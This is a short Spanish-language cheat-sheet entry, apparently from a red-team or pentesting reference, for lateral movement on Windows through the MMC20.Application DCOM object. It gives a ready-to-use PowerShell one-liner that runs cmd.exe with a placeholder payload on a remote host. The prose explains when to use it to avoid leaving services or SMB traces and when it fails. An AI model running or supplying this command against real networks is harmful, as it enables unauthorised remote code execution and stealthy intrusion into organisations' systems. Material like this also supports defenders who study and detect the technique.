Invoke-DCOM (MMC20)
$com = [Type]::GetTypeFromProgID("MMC20.Application","<target>") ; $obj = [System.Activator]::CreateInstance($com) ; $obj.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c <payload>","7")
Ejecuta comandos en un host remoto abusando del objeto DCOM MMC20.Application (método ExecuteShellCommand), sin crear servicios ni archivos.
Cuando tienes credenciales administrativas y quieres lateral movement sin dejar servicios (como hace PsExec) y sin depender de SMB. DCOM usa RPC (135) y permite ejecución remota directa desde PowerShell.
Si el DCOM está restringido en el host (DCOM Machine Launch Restrictions) o el firewall bloquea 135. Tampoco si necesitas interactividad: no devuelve salida directamente, hay que redirigirla a archivo.